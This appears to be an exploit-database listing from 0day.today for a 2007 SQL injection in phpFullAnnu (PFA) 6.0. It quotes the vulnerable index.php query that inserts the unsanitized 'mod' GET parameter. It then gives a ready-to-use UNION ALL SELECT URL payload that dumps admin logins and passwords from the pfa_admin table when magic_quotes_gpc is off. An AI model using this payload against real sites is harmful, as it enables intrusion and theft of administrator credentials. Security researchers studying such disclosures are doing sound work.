[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpFullAnnu (PFA) 6.0 Remote SQL Injection Vulnerability

Author
IHTeam
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2166
Category
web applications
Date add
22-09-2007
Platform
unsorted
========================================================
phpFullAnnu (PFA) 6.0 Remote SQL Injection Vulnerability
========================================================



#########################################################################################
#
#        Inclusion Hunter Team
#        http://www.ihteam.net
#
#
#         [phpFullAnnu (PFA) 6.0]
#
#
# Class:     SQL Injection  # Found:     22/09/2007 # Remote:    Yes # Site:      http://pfa.netsliver.com/
# Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
# Author:    R00T[ATI] of IHTeam
# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
##########################################################################################



        Vulnerable code:
        index.php
============================================================================================================

$sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM
'.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\''));
[...]
//in /include/meta.inc.php
<title><?php echo $title_site, ' - ', $sqltitle;...
//So watch Title bar to see the injection
============================================================================================================



        Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================

http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/*
===================================================================================================================



        Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================



#  0day.today [2024-12-24]  #